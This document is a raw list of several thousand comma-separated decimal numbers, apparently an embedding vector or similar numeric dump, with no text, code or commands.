0.036636833101511, 0.011069294065237045, -0.009335641749203205, 0.02802993729710579, -0.003921813331544399, 0.022476112470030785, -0.023105137050151825, -0.03675956651568413, -0.0012148991227149963, 0.03117506019771099, 0.029487432911992073, 0.002807596465572715, 0.008269368670880795, -0.05222436040639877, 0.028367463499307632, -0.0033656638115644455, -0.0005686149816028774, 0.018855387344956398, 0.008476486429572105, 0.02942606434226036, 0.009251260198652744, -0.01768939197063446, 0.007625002413988113, 0.004779050592333078, -0.0484195314347744, 0.009588785469532013, 0.02109532803297043, -0.007049675099551678, 0.024439897388219833, -0.006144493818283081, -0.04528975114226341, -0.010026033967733383, -0.019070176407694817, -0.020727118477225304, -0.0318194255232811, -0.027753781527280807, 0.04197586700320244, -0.04673190414905548, 0.00047440515481866896, 0.013899903744459152, -0.07388734817504883, -0.017612680792808533, -0.021356143057346344, 0.015472464263439178, -0.03629930689930916, 0.0013174990890547633, 0.02680257335305214, 0.016508053988218307, -0.00015174252621363848, 0.009550430811941624, 0.0046409722417593, -0.005151095800101757, -0.004775215405970812, 0.029656196013092995, -0.01070108450949192, -0.014751387760043144, 0.012687881477177143, 0.006175178103148937, -0.0020577532704919577, 0.005013016983866692, 0.04915595054626465, -0.014874123968183994, -0.012258303351700306, 0.0008927159360609949, -0.03169668838381767, 0.010509309358894825, 0.002861293498426676, 0.0070381686091423035, 0.003687846940010786, 0.010601361282169819, 0.010716427117586136, -0.020404934883117676, -0.016722841188311577, 0.003091424470767379, -0.05787023901939392, -0.003996605984866619, -0.008438130840659142, -0.023319926112890244, -0.009834258817136288, 0.00129640381783247, -0.008100605569779873, -0.004019618965685368, 0.024900158867239952, -0.0166001059114933, -0.00326210493221879, 0.01469769049435854, 0.0083230659365654, -0.0012244879035279155, -0.02778446488082409, 0.004522071219980717, 0.002310897223651409, -0.02213858813047409, -0.010417256504297256, 0.02666449546813965, 0.056734926998615265, -0.0004163930134382099, -0.055507563054561615, 0.03823240473866463, -0.018410468474030495, 0.020589040592312813, -0.05817708000540733, -0.0346730500459671, 0.031405191868543625, -0.004399335011839867, -0.038201723247766495, -0.0030511515215039253, -0.04001208394765854, 0.019530437886714935, -0.03715846315026283, -0.009304957464337349, -0.03933703526854515, -0.0085685383528471, -0.02448592334985733, 0.02644970640540123, 0.024087028577923775, -0.023181848227977753, -0.021908456459641457, -0.00041687244083732367, 0.018471837043762207, 0.013025405816733837, 0.018379783257842064, 0.030423298478126526, -0.007429391145706177, 0.034734416753053665, -0.016201211139559746, 0.008875380270183086, -0.002370347734540701, 0.011836396530270576, 0.04381691291928291, -0.0066737947054207325, -0.00546560762450099, 0.012304329313337803, 0.032801318913698196, -0.005672725383192301, -0.017367208376526833, 0.004564261995255947, 0.025651918724179268, -0.01811896823346615, 0.006727491971105337, -0.03464236482977867, 0.03725051507353783, 0.017489945515990257, 0.0019570710137486458, 0.005979566834867001, -0.002763488097116351, 0.03491852059960365, -0.004176875110715628, -0.00938933901488781, 0.010102744214236736, -0.001735570142045617, 0.005515469238162041, -0.025667261332273483, 0.022782955318689346, 0.016369974240660667, 0.02816801704466343, 0.00459878146648407, -0.009887956082820892, 0.006915431935340166, -0.02549849823117256, -0.012480762787163258, 0.0058683366514742374, 0.02690996788442135, 0.032279688864946365, -0.008975103497505188, 0.004686998203396797, 0.02175503596663475, 0.0018132393015548587, 0.025068920105695724, -0.0068157087080180645, -0.014682348817586899, 0.013784837909042835, -0.007931843400001526, -0.021801061928272247, -0.018701966851949692, -0.040687136352062225, 0.03636067360639572, -0.031052323058247566, -0.0014229757944121957, 0.017367208376526833, 0.01793486438691616, -0.01198214665055275, 0.00863757822662592, -0.02014411985874176, 0.008415117859840393, -0.018686626106500626, 0.008913734927773476, 0.007552127353847027, -0.014728374779224396, 0.000016480724298162386, -0.0075444565154612064, -0.024685369804501534, 0.008415117859840393, -0.00038283225148916245, 0.016661474481225014, -0.008990445174276829, -0.008399776183068752, 0.013539365492761135, -0.003613054286688566, -0.04550454020500183, -0.014413862489163876, 0.024087028577923775, 0.0026925308629870415, -0.0014862617244943976, -0.01968385837972164, 0.029057854786515236, -0.006923103239387274, 0.01670750044286251, 0.0556916669011116, 0.009849600493907928, 0.010969570837914944, 0.015786975622177124, 0.02879704162478447, 0.033997997641563416, -0.007394871208816767, 0.013362931087613106, 0.02210790477693081, -0.046578485518693924, 0.006140658166259527, -0.017597340047359467, 0.015296030789613724, 0.01555684581398964, 0.0012062692549079657, 0.0045105647295713425, -0.00609463220462203, -0.02585136517882347, -0.036207254976034164, 0.023672793060541153, 0.0059642246924340725, -0.02707873098552227, -0.003417443251237273, 0.010563005693256855, 0.015395754016935825, -0.012918012216687202, 0.0002979715063702315, -0.016584763303399086, 0.01583300344645977, -0.001698173931799829, -0.030561376363039017, 0.007575140800327063, -0.028965802863240242, 0.007590482477098703, -0.0007949103019200265, 0.006213533226400614, 0.03534809872508049, 0.011775028891861439, -0.03338431566953659, -0.01604779064655304, -0.001305992598645389, 0.012020501308143139, 0.012887327931821346, -0.009021129459142685, 0.052009571343660355, 0.0636388510465622, 0.010601361282169819, -0.028735673055052757, -0.030668770894408226, -0.025268368422985077, -0.020450962707400322, 0.0018257048213854432, 0.018824703991413116, -0.013807850889861584, -0.04047234728932381, -0.009573443792760372, 0.01080847904086113, 0.0046333009377121925, 0.008906063623726368, -0.032249003648757935, -0.0004350911476649344, 0.021463537588715553, -0.011698318645358086, -0.02134080044925213, 0.010033705271780491, 0.026050811633467674, -0.03952113911509514, 0.00810827687382698, 0.012089541181921959, -0.0005489579634740949, -0.002763488097116351, 0.022261325269937515, -0.02000604197382927, 0.008929077535867691, -0.011974475346505642, -0.00034327851608395576, -0.02203119359910488, -0.04501359537243843, 0.033230893313884735, -0.004897951614111662, 0.04038029536604881, 0.020604383200407028, 0.00021430935885291547, -0.03455031290650368, 0.026050811633467674, -0.009489062242209911, -0.008254026994109154, -0.019530437886714935, -0.007678699679672718, 0.012373369187116623, -0.0009550430113449693, -0.016262579709291458, 0.004165368620306253, 0.03519468009471893, 0.004334131255745888, 0.0026215738616883755, 0.02841348946094513, -0.015955738723278046, -0.027109414339065552, -0.009558101184666157, -0.03366047143936157, 0.012219948694109917, 0.019806595519185066, -0.013823193497955799, -0.001044218777678907, -0.0070381686091423035, -0.010593689978122711, -0.0020692599937319756, -0.023319926112890244, -0.027861176058650017, -0.014130034483969212, -0.03602315112948418, 0.014720703475177288, -0.012035843916237354, -0.0008438131189905107, -0.003091424470767379, 0.02134080044925213, 0.004545084200799465, -0.029364697635173798, -0.029241960495710373, 0.015541503205895424, 0.01254213135689497, -0.03142053261399269, -0.016906946897506714, 0.004337966442108154, -0.008675932884216309, -0.00172981689684093, 0.02308979630470276, 0.009327970445156097, -0.00318347685970366, 0.0030434804502874613, -0.02508426271378994, 0.015104254707694054, 0.00029677292332053185, -0.00522780604660511, 0.009903297759592533, -0.02213858813047409, 0.03412073478102684, 0.008944419212639332, 0.0040503027848899364, 0.0007637467933818698, -0.039152927696704865, -0.02112601138651371, 0.009113181382417679, 0.02091122418642044, -0.009128523990511894, -0.009757548570632935, 0.007878146134316921, -0.007049675099551678, -0.0075252787210047245, -0.0017902262043207884, 0.0327092669904232, 0.015480135567486286, -0.025145631283521652, 0.014367836527526379, -0.03134382143616676, 0.016523394733667374, -0.0019733719527721405, 0.010632045567035675, -0.022015850991010666, -0.02074246108531952, -0.011176688596606255, 0.051518626511096954, -0.013132800348103046, -0.014091678895056248, 0.0061061386950314045, 0.022675560787320137, 0.03246379271149635, -0.027385571971535683, 0.016768869012594223, -0.018701966851949692, 0.01024849433451891, 0.010125757195055485, -0.02221529744565487, 0.0037242842372506857, -0.02770775556564331, -0.005354377906769514, -0.003678258042782545, -0.0066277687437832355, -0.003689764766022563, 0.029410723596811295, -0.013784837909042835, -0.012802946381270885, -0.03433552384376526, 0.019591806456446648, 0.0041461908258497715, -0.038938138633966446, -0.018103627488017082, 0.023596083745360374, 0.015786975622177124, -0.028597593307495117, -0.010325204581022263, -0.019284965470433235, -0.02238406054675579, 0.005381226539611816, 0.041178081184625626, -0.04679327458143234, 0.0036379853263497353, -0.011828726157546043, -0.01583300344645977, 0.03138984739780426, 0.0022763777524232864, 0.031481899321079254, -0.003618807764723897, -0.00004590631215251051, -0.002738557057455182, 0.012381039559841156, 0.029027171432971954, -0.02134080044925213, 0.0041461908258497715, -0.00017235841369256377, -0.05940444394946098, 0.025774655863642693, 0.002247611293569207, 0.026434363797307014, 0.007578975986689329, 0.01229665894061327, 0.010102744214236736, -0.009373996406793594, 0.014237429015338421, 0.010708755813539028, 0.016385316848754883, -0.010984912514686584, 0.017996232956647873, -0.0006170383421704173, 0.003684011287987232, -0.016615446656942368, 0.04397033527493477, -0.028137331828475, -0.01845649443566799, -0.018717309460043907, -0.02882772497832775, -0.0024873309303075075, -0.017996232956647873, -0.005925869569182396, -0.028965802863240242, -0.005814639385789633, 0.0038412674330174923, 0.008829353377223015, 0.018057601526379585, -0.019223596900701523, 0.01716776192188263, -0.009343313053250313, -0.01719844527542591, -0.017459260299801826, -0.004276598338037729, 0.006397637538611889, 0.0013146224664524198, 0.051518626511096954, 0.0057877907529473305, -0.016906946897506714, -0.010348217561841011, 0.013140471652150154, 0.015863686800003052, -0.005872172303497791, -0.016369974240660667, -0.009412351995706558, -0.011284083127975464, 0.015740949660539627, -0.0150275444611907, 0.015894370153546333, 0.012603499926626682, -0.023289242759346962, -0.004364815074950457, -0.012173921801149845, 0.0010240823030471802, 0.01419140212237835, 0.025283709168434143, -0.0032640225253999233, 0.01807294227182865, -0.007939514704048634, 0.012695551849901676, 0.03777214512228966, -0.04271228611469269, 0.01026383601129055, -0.010286848992109299, -0.030960271134972572, -0.018471837043762207, 0.013738811947405338, 0.018609914928674698, -0.0430191271007061, -0.014620980247855186, 0.03930635005235672, 0.023028427734971046, -0.002009809482842684, -0.02295171655714512, -0.03728119656443596, -0.012480762787163258, -0.010908202268183231, -0.010555335320532322, -0.018993467092514038, 0.004495222587138414, -0.022153930738568306, -0.005354377906769514, 0.035716310143470764, 0.01373114064335823, -0.02143285423517227, 0.03731188178062439, 0.03436620905995369, 0.012971709482371807, 0.0007680617272853851, -0.047100115567445755, -0.018471837043762207, -0.008208000101149082, -0.016308605670928955, -0.0011180524015799165, -0.010885189287364483, 0.04961621016263962, -0.016001764684915543, 0.008614565245807171, -0.012473092414438725, 0.012457749806344509, 0.002755817025899887, -0.04231339320540428, -0.013539365492761135, 0.023902924731373787, -0.0007848421228118241, 0.023703478276729584, 0.01583300344645977, -0.0009991514962166548, -0.011130662634968758, 0.012864314951002598, -0.003829760942608118, -0.013646760024130344, -0.022644875571131706, -0.0171370767056942, -0.013600733131170273, -0.01888607256114483, -0.002078848658129573, 0.0036207253579050303, 0.012718564830720425, 0.0007373776170425117, -0.013631417416036129, 0.028597593307495117, -0.003453880548477173, -0.002000220585614443, -0.012427066452801228, 0.0015773552004247904, -0.021678326651453972, -0.02424044907093048, 0.0029149907641112804, -0.034488942474126816, -0.024516606703400612, 0.02890443429350853, -0.015618213452398777, -0.016768869012594223, -0.012219948694109917, 0.0016070804558694363, 0.010401914827525616, 0.01864059828221798, -0.003921813331544399, -0.026465047150850296, 0.03191147744655609, 0.014551941305398941, -0.04200655221939087, -0.001235035597346723, -0.02500755339860916, -0.008929077535867691, 0.005085892044007778, -0.0075252787210047245, 0.01469769049435854, 0.04473743960261345, -0.012028172612190247, 0.023657452315092087, -0.0010959982173517346, -0.022061876952648163, -0.010900530964136124, 0.003248680615797639, -0.0038738693110644817, 0.00389304687269032, 0.052991464734077454, -0.039183612912893295, 0.0042267367243766785, -0.006669959053397179, 0.007816777564585209, 0.0256826039403677, -0.012396382167935371, -0.021003276109695435, 0.00016037243767641485, -0.0010624374262988567, 0.024792764335870743, -0.020481646060943604, -0.0014805084792897105, 0.003969757352024317, -0.018272390589118004, -0.027753781527280807, -0.011337780393660069, -0.02525302581489086, -0.03338431566953659, -0.02402566187083721, 0.017321182414889336, 0.004943978041410446, 0.005561495665460825, 0.0016655720537528396, 0.027170782908797264, 0.007042004261165857, -0.013516352511942387, 0.004456867463886738, -0.018763335421681404, 0.0072414507158100605, 0.01618587039411068, 0.0027040375862270594, 0.005116575863212347, 0.00194652343634516, -0.007502265740185976, 0.02931866981089115, 0.041392870247364044, 0.03178874030709267, -0.03749598562717438, 0.016109159216284752, -0.010655058547854424, -0.013562378473579884, 0.006359282415360212, 0.03185011073946953, 0.0009627140825614333, -0.01166763436049223, 0.033445682376623154, 0.024716053158044815, 0.01828773133456707, 0.01359306275844574, 0.015756292268633842, 0.021187379956245422, -0.007885817438364029, -0.00984192918986082, 0.010570676997303963, -0.029763590544462204, -0.015004531480371952, 0.01741323433816433, 0.02686394192278385, 0.008392104879021645, -0.06127617508172989, -0.0027078730054199696, -0.010325204581022263, 0.01845649443566799, 0.008507170714437962, -0.004675491712987423, -0.0029073196928948164, -0.0017106393352150917, 0.022430086508393288, 0.0005427252617664635, 0.05753271281719208, -0.0077017126604914665, 0.02063506655395031, 0.003260187106207013, 0.0021478880662471056, -0.011583252809941769, 0.03092958591878414, -0.005638205911964178, -0.020957250148057938, -0.03369115665555, 0.0038777049630880356, -0.031098349019885063, -0.005611357279121876, -0.012235290370881557, 0.0038834582082927227, 0.0030780001543462276, -0.0054425946436822414, 0.01394592970609665, 0.0026503403205424547, -0.002142134588211775, -0.01962248980998993, -0.011920778080821037, 0.01850252039730549, -0.013853877782821655, -0.0024087028577923775, 0.0077017126604914665, -0.006965294014662504, -0.0239642933011055, -0.0020424113608896732, -0.011169017292559147, -0.0024796598590910435, 0.015035215765237808, -0.041853129863739014, -0.010064389556646347, 0.0032237498089671135, -0.020957250148057938, 0.014337152242660522, -0.010110415518283844, -0.02312047965824604, -0.0073833647184073925, 0.012488434091210365, -0.003522919723764062, -0.03076082468032837, -0.008675932884216309, 0.029870985075831413, 0.0948752760887146, 0.0003912224492523819, -0.020374251529574394, 0.004176875110715628, -0.006462841294705868, 0.016876261681318283, -0.009105511009693146, -0.0021287102717906237, 0.008767985738813877, 0.009980008006095886, 0.01965317502617836, 0.0037396263796836138, 0.009335641749203205, -0.008537854999303818, 0.005668890196830034, 0.012641854584217072, -0.013240194879472256, -0.013355260714888573, 0.012135567143559456, -0.021187379956245422, 0.022675560787320137, 0.0019867962691932917, 0.02301308512687683, -0.02557520940899849, 0.030745482072234154, -0.015579858794808388, -0.018333757296204567, -0.020681092515587807, -0.030960271134972572, -0.009036471135914326, -0.0013884560903534293, 0.016170527786016464, -0.0059028565883636475, -0.010632045567035675, 0.013002392835915089, -0.005757106933742762, 0.008837024681270123, 0.0032199141569435596, -0.014667006209492683, -0.027554333209991455, -0.00011266823275946081, -0.03246379271149635, -0.031481899321079254, 0.007375693880021572, -0.017812127247452736, -0.012166251428425312, 0.024654684588313103, -0.005339035764336586, -0.010716427117586136, 0.0052201347425580025, -0.0007421720074489713, -0.025529183447360992, 0.008852366358041763, 0.03390594571828842, -0.0007186794537119567, 0.0007311449153348804, 0.0015437945257872343, -0.018164996057748795, -0.012327342294156551, -0.01853320375084877, -0.00938933901488781, 0.007993211969733238, -0.0051932861097157, 0.005734093952924013, -0.002318568294867873, -0.023902924731373787, -0.037189144641160965, -0.008675932884216309, -0.00200597383081913, 0.02049698866903782, 0.008576209656894207, 0.021310117095708847, 0.010516979731619358, 0.005492456257343292, 0.00530835147947073, 0.026465047150850296, -0.011805713176727295, 0.00535054225474596, -0.028152674436569214, 0.007755409926176071, 0.03415141999721527, 0.03482646867632866, 0.009895626455545425, 0.023948950693011284, -0.027124756947159767, 0.032279688864946365, -0.008798670023679733, 0.010279177688062191, -0.02358074113726616, 0.010708755813539028, -0.016339290887117386, -0.000054865831771166995, 0.009220575913786888, 0.022506797686219215, 0.010785466060042381, 0.037680093199014664, 0.011146004311740398, -0.004514400381594896, -0.008614565245807171, -0.009665495716035366, 0.017612680792808533, -0.0023511701729148626, 0.030254535377025604, -0.006075454410165548, 0.0018314580665901303, 0.004357144236564636, -0.014329480938613415, 0.006171342451125383, 0.00854552537202835, -0.01986796408891678, -0.040441662073135376, -0.024670027196407318, -0.002362676663324237, -0.03125176951289177, 0.004153861664235592, -0.007870474830269814, 0.008790998719632626, 0.017858155071735382, -0.020450962707400322, -0.01646202616393566, -0.011115320026874542, -0.013071432709693909, 0.03605383262038231, -0.0121048828586936, -0.01629326492547989, 0.021816404536366463, 0.015817660838365555, -0.010049046948552132, 0.03949045389890671, 0.03952113911509514, 0.0283367782831192, 0.0022782953456044197, 0.00030995748238638043, -0.02855156734585762, 0.03519468009471893, -0.029195934534072876, 0.037434618920087814, 0.020757803693413734, 0.002755817025899887, -0.0008620318258181214, -0.009005787782371044, 0.02413305453956127, 0.012994722463190556, -0.00877565611153841, 0.0006606673123314977, 0.0012302411487326026, 0.03362978994846344, 0.003954415209591389, 0.008399776183068752, 0.0055384826846420765, -0.010309861972928047, -0.03243310749530792, 0.002878553466871381, 0.0239642933011055, -0.0065318807028234005, 0.014099350199103355, 0.009358654730021954, -0.01992933265864849, -0.008392104879021645, 0.00479822838678956, 0.014237429015338421, 0.004740695469081402, 0.01850252039730549, -0.008814011700451374, -0.007256792858242989, 0.030331246554851532, -0.0019810430239886045, -0.04473743960261345, -0.021555589511990547, -0.039214298129081726, 0.014076337218284607, 0.016860920935869217, -0.014199073426425457, 0.0244552381336689, 0.0256826039403677, 0.00428426917642355, -0.005208628252148628, -0.0024796598590910435, 0.031481899321079254, -0.01776610128581524, 0.005657383240759373, 0.019100861623883247, 0.0037798993289470673, -0.014828098006546497, 0.013708127662539482, -0.021877773106098175, -0.0035190843045711517, 0.020957250148057938, -0.028981145471334457, 0.021831747144460678, 0.0035478505305945873, 0.023304583504796028, -0.026848599314689636, 0.004268927499651909, -0.002308979630470276, -0.013408957980573177, -0.013623746111989021, -0.033752523362636566, -0.007057345937937498, 0.009420023299753666, -0.013570048846304417, 0.0008730589179322124, -0.01024849433451891, 0.003825925523415208, 0.0021037794649600983, -0.021463537588715553, -0.010217810049653053, 0.008959760889410973, 0.0007738149724900723, -0.011030938476324081, -0.027876516804099083, 0.012634184211492538, 0.011030938476324081, -0.00046841218136250973, 0.01779678650200367, 0.0017835141625255346, 0.003528672968968749, -0.033997997641563416, -0.018195679411292076, 0.01951509714126587, -0.011782699264585972, 0.02511494792997837, 0.009811244904994965, 0.005703409668058157, -0.0171370767056942, 0.008714288473129272, 0.03590041399002075, -0.02560589276254177, -0.02525302581489086, -0.0032851179130375385, -0.03240242227911949, -0.0018726898124441504, 0.011414490640163422, 0.029380038380622864, 0.0036609983071684837, -0.024746738374233246, 0.019960016012191772, 0.0007656645029783249, 0.006926938891410828, -0.033507052809000015, 0.013539365492761135, 0.00876031443476677, -0.0034979889169335365, -0.006102303043007851, -0.006255723536014557, -0.00028478691820055246, 0.017382550984621048, 0.019806595519185066, -0.010332874953746796, 0.018932098522782326, -0.021570932120084763, -0.01656942069530487, -0.012887327931821346, 0.009642482735216618, -0.006731327623128891, 0.028244726359844208, 0.012925682589411736, -0.005323693621903658, 0.008461144752800465, -0.0031853944528847933, 0.007939514704048634, -0.021187379956245422, -0.005074385087937117, -0.0013865383807569742, -0.011314766481518745, 0.04909458011388779, -0.0017624187748879194, -0.008039237931370735, 0.01135312207043171, 0.002226515905931592, 0.02298240177333355, -0.0022610356099903584, 0.008208000101149082, -0.016247238963842392, 0.0030626580119132996, -0.010961899533867836, 0.0011698318412527442, -0.020681092515587807, -0.010555335320532322, 0.0009612757712602615, -0.021908456459641457, 0.05458704009652138, 0.01123038586229086, -0.012534460052847862, 0.005246983375400305, -0.025345077738165855, -0.047560375183820724, 0.004974661860615015, -0.0074792527593672276, 0.002228433731943369, -0.0032659403514117002, -0.0009627140825614333, -0.007640344090759754, -0.024194423109292984, 0.011890093795955181, 0.00353442644700408, -0.015955738723278046, 0.04071781784296036, -0.0323103703558445, 0.01727515645325184, 0.02532973513007164, 0.008392104879021645, 0.01926962286233902, 0.010800807736814022, -0.007870474830269814, 0.012764591723680496, -0.007613495923578739, -0.02161695808172226, 0.010148770175874233, 0.0039429087191820145, 0.02683325670659542, -0.01727515645325184, 0.009504403918981552, -0.0430191271007061, 0.00691926758736372, -0.010041376575827599, -0.0042881048284471035, -0.004330295603722334, -0.010570676997303963, 0.004499058239161968, 0.002028987044468522, 0.003831678768619895, -0.03755735605955124, -0.0185638889670372, -0.009711521677672863, 0.005910527426749468, -0.0010212056804448366, 0.006083125714212656, -0.0001481467334087938, -0.0163546334952116, 0.032279688864946365, 0.012910340912640095, 0.03316952660679817, -0.004805899225175381, -0.00884469598531723, -0.016998998820781708, 0.007042004261165857, 0.009481390938162804, -0.011928449384868145, 0.008737301453948021, -0.03927566483616829, 0.03436620905995369, -0.001959947869181633, -0.005105069372802973, 0.03051535040140152, -0.0034308675676584244, 0.004311117809265852, -0.0038642806466668844, -0.0033771703019738197, -0.014528927393257618, -0.03051535040140152, 0.010754781775176525, 0.0040656449273228645, 0.020834513008594513, 0.012933353893458843, 0.008906063623726368, -0.0040848227217793465, 0.010977242141962051, 0.009657824411988258, -0.023135822266340256, -0.016937630251049995, 0.007429391145706177, -0.01273390743881464, 0.00011128983896924183, 0.0024259628262370825, 0.0008318271720781922, -0.012519118376076221, 0.009611798450350761, 0.007916501723229885, -0.02718612551689148, -0.012097211554646492, 0.015587530098855495, 0.006712149828672409, -0.0005384103278629482, -0.021816404536366463, 0.006846392992883921, 0.026572441682219505, -0.02104930207133293, -0.027278177440166473, 0.020098093897104263, 0.008369091898202896, 0.008138961158692837, -0.002677188953384757, 0.0010720262071117759, -0.04271228611469269, 0.01243473682552576, -0.01902415044605732, -0.004970826208591461, -0.016231896355748177, -0.00895209051668644, 0.0032103254925459623, 0.004656314384192228, 0.008752643130719662, 0.04749900847673416, 0.001238871132954955, 0.007333503104746342, 0.016032449901103973, 0.0034289497416466475, -0.019852621480822563, 0.00475603761151433, 0.019453728571534157, 0.003530590794980526, -0.008906063623726368, 0.01954578049480915, -0.010662729851901531, 0.008307723328471184, -0.02694065123796463, -0.023519372567534447, 0.04516701400279999, -0.010992583818733692, 0.028106648474931717, -0.01277226209640503, 0.01913154497742653, -0.01068574283272028, -0.012388710863888264, -0.0017902262043207884, -0.020343568176031113, 0.0020596710965037346, 0.00188707304187119, 0.006493525579571724, -0.004644807893782854, -0.0037319553084671497, -0.010693413205444813, -0.0484195314347744, 0.0056612188927829266, -0.030039748176932335, 0.012703223153948784, -0.012741577811539173, -0.0025371925439685583, 0.005668890196830034, -0.0068770768120884895, 0.008798670023679733, 0.01341662835329771, -0.0018669365672394633, 0.014199073426425457, 0.00963481143116951, -0.005668890196830034, -0.009450706653296947, -0.0066047552973032, -0.008269368670880795, 0.016508053988218307, -0.01415304746478796, 0.0016483122017234564, 0.023550057783722878, -0.0008989486377686262, -0.008798670023679733, -0.004487551748752594, 0.0014335234882310033, -0.0014805084792897105, -0.013431970961391926, 0.02115669660270214, 0.0028651291504502296, 0.0032774468418210745, 0.02312047965824604, -0.00636695371940732, -0.010118086822330952, 0.023074453696608543, 0.012641854584217072, -0.014843439683318138, -0.0022188450675457716, -0.000739774783141911, -0.021218065172433853, 0.02519165724515915, 0.00487110298126936, 0.02227666601538658, 0.009151536971330643, -0.002677188953384757, 0.0005983402370475233, -0.004863432142883539, -0.025529183447360992, 0.014521257020533085, -0.014452217146754265, 0.011483529582619667, -0.0045719328336417675, 0.00833840761333704, -0.01730583980679512, -0.012304329313337803, -0.014950834214687347, 0.01976056955754757, -0.005312187131494284, 0.018901413306593895, 0.005691903177648783, -0.005492456257343292, 0.0075252787210047245, -0.006240381393581629, 0.017919521778821945, 0.010003020986914635, 0.012365697883069515, 0.020067410543560982, 0.002393360948190093, -0.0009631934808567166, -0.003758803941309452, -0.01482042670249939, 0.006600920110940933, 0.017720075324177742, 0.012373369187116623, 0.01536506973206997, 0.02104930207133293, 0.021954484283924103, -0.006002579815685749, -0.0001522219681646675, -0.015280688181519508, 0.0029188264161348343, 0.0027155440766364336, 0.022890347987413406, 0.002385689876973629, -0.006907761096954346, 0.013562378473579884, 0.009987679310142994, -0.009182221256196499, 0.0020615889225155115, -0.012358026579022408, -0.008806340396404266, 0.007176246959716082, 0.004069480579346418, 0.0140686659142375, -0.007878146134316921, 0.005262325517833233, -0.016906946897506714, -0.019392360001802444, 0.009458377957344055, 0.020926564931869507, -0.0022591177839785814, -0.005876007955521345, -0.0049976748414337635, 0.017919521778821945, 0.01413770578801632, 0.012549802660942078, -0.020021384581923485, 0.0017787197139114141, -0.001167914131656289, -0.007103372365236282, -0.005105069372802973, -0.021494220942258835, 0.0071187145076692104, 0.008767985738813877, 0.02413305453956127, -0.01825704798102379, 0.001840087934397161, -0.01845649443566799, 0.011798041872680187, 0.0061675067991018295, -0.009105511009693146, 0.018164996057748795, -0.0009267561254091561, -0.006301749963313341, 0.009972336702048779, -0.0029303329065442085, -0.02494618482887745, 0.0016742019215598702, 0.0071187145076692104, -0.0032716935966163874, -0.0020692599937319756, -0.03002440556883812, 0.006574071478098631, 0.0016780374571681023, -0.013462655246257782, -0.008629906922578812, -0.004729188978672028, 0.01488946657627821, -0.007540620863437653, -0.013807850889861584, 0.02014411985874176, 0.0008821682422421873, -0.0039083887822926044, 0.01758199743926525, 0.0014153047231957316, -0.003965921700000763, -0.0038412674330174923, -0.023626767098903656, -0.005162602290511131, -0.0018707721028476954, -0.00896743219345808, 0.023764846846461296, -0.013807850889861584, -0.003444291651248932, -0.009665495716035366, -0.009604127146303654, 0.013493338599801064, -0.007855133153498173, 0.023151163011789322, 0.0019340580329298973, -0.014950834214687347, -0.003329226281493902, -0.007206931244581938, -0.029057854786515236, 0.019070176407694817, -0.006420650985091925, -0.02374950423836708, -0.0054579367861151695, 0.004775215405970812, 0.021494220942258835, -0.003829760942608118, -0.01147585827857256, 0.0029380039777606726, -0.015848344191908836, -0.019315648823976517, -0.011422161012887955, -0.003753050696104765, 0.010593689978122711, 0.006459006108343601, 0.010662729851901531, -0.020788487046957016, -0.0129640381783247, 0.013501009903848171, 0.0031355328392237425, 0.01222761906683445, -0.01415304746478796, -0.006781189236789942, -0.018717309460043907, 0.009489062242209911, -0.014130034483969212, -0.0002488289901521057, -0.01024849433451891, -0.0036207253579050303, -0.009304957464337349, 0.002945674816146493, -0.008998116478323936, -0.02014411985874176, -0.03881540521979332, 0.014037981629371643, 0.016308605670928955, -0.003246762789785862, 0.011805713176727295, 0.0021363813430070877, -0.007532950025051832, -0.023273900151252747, -0.002719379495829344, -0.000019417289877310395, 0.0034788113553076982, 0.01057834830135107, 0.026434363797307014, 0.011468187905848026, 0.02970222197473049, -0.006834886502474546, 0.01916222833096981, -0.0035766169894486666, -0.020312882959842682, -0.0015131103573367, -0.02210790477693081, -0.00045666590449400246, -0.003822089871391654, 0.004832747858017683, 0.011322437785565853, -0.020957250148057938, -0.004153861664235592, 0.02137148566544056, -0.015180964954197407, -0.013431970961391926, 0.01133010908961296, 0.0039237309247255325, 0.022169271484017372, -0.0012618842301890254, 0.014199073426425457, 0.010724097490310669, -0.015610543079674244, 0.003160463646054268, -0.00915920827537775, 0.0027654056902974844, 0.01976056955754757, 0.013393615372478962, 0.010033705271780491, -0.013815522193908691, 0.015058228746056557, 0.0021919964347034693, -0.000702378514688462, 0.002861293498426676, 0.023028427734971046, 0.008254026994109154, 0.02123340591788292, 0.00719158910214901, -0.00016432780830655247, -0.012718564830720425, 0.010033705271780491, -0.005400403868407011, 0.005565331317484379, -0.012181593105196953, -0.0035977123770862818, -0.007164740469306707, 0.0038642806466668844, 0.0003205051471013576, -0.015188636258244514, 0.0040042768232524395, -0.0042881048284471035, 0.00393140222877264, -0.01555684581398964, -0.01877867802977562, 0.0028708823956549168, 0.00004890280615654774, -0.006662288215011358, 0.00243555149063468, 0.006811873055994511, 0.017244471237063408, -0.018824703991413116, -0.014122363179922104, -0.05019921064376831, -0.014459888450801373, 0.006788860075175762, -0.00767102837562561, -0.002168983221054077, 0.00267527112737298, -0.007678699679672718, 0.006236546207219362, 0.010279177688062191, -0.018241705372929573, 0.0132095105946064, 0.018901413306593895, 0.00013244510046206415, 0.002821020781993866, -0.016262579709291458, 0.01513493899255991, -0.00017583435692358762, 0.009926310740411282, -0.004276598338037729, -0.0016070804558694363, 0.013324576430022717, 0.012473092414438725, -0.017996232956647873, 0.020543014630675316, -0.015510819852352142, -0.005653548054397106, 0.010793137364089489, -0.0030933422967791557, -0.021801061928272247, 0.00907482672482729, 0.008576209656894207, -0.010563005693256855, -0.018088284879922867, -0.03537878394126892, -0.005776284262537956, 0.0220005102455616, 0.01951509714126587, 0.03335363045334816, -0.008576209656894207, -0.000019492203136906028, 0.0053620487451553345, 0.0011573664378374815, -0.01383853517472744, -0.01594039797782898, 0.009450706653296947, 0.03611520305275917, 0.011567911133170128, 0.008514841087162495, -0.00018098832515534014, 0.013447312638163567, -0.0036360675003379583, -0.004545084200799465, 0.006313256453722715, -0.019852621480822563, 0.02014411985874176, -0.01954578049480915, 0.0027596524450927973, -0.005879843141883612, 0.019238939508795738, 0.011782699264585972, -0.004276598338037729, 0.01136846374720335, -0.002541028195992112, 0.0036418207455426455, -0.008860037662088871, -0.00044467992847785354, 0.017597340047359467, 0.02235337719321251, 0.0034557983744889498, 0.011322437785565853, 0.001505439286120236, 0.004073316231369972, -0.027201466262340546, -0.02252214029431343, -0.018103627488017082, 0.006597084458917379, -0.0061061386950314045, 0.02620423398911953, -0.02227666601538658, -0.0048097348771989346, 0.002243775874376297, 0.00783595535904169, -0.021524906158447266, 0.003033891785889864, -0.009366326034069061, 0.008169645443558693, -0.012465421110391617, -0.0063899667002260685, 0.004556590691208839, 